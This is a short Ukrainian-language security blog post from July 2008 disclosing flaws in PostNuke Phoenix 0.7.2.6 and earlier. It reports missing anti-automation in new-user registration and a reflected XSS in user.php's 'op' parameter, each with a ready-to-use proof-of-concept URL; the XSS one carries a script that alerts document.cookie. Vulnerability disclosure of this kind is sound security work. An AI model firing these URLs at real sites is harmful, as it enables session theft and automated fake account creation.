Websecurity - Веб безпека

Нещодавно, 19.07.2008, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі PostNuke Phoenix. Дірки я виявив на декількох сайтах, що використовують даний движок. Про що найближчим часом повідомлю розробникам системи.

Insufficient Anti-automation:

Уразливість в user.php (в модулі NS-NewUser).

http://site/user.php?uname=test&pass=12345&vpass=12345&email=test@test.com&vemail=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уразливість в user.php (в модулі NS-NewUser) в параметрі op.

http://site/user.php?module=NS-NewUser&op=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дірки перевірив на версіях 0.7.2.3 і 0.7.2.6. Тому уразливі PostNuke Phoenix 0.7.2.6 та попередні версії (та потенційно наступні версії).

This entry was posted on 23:55 23.07.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.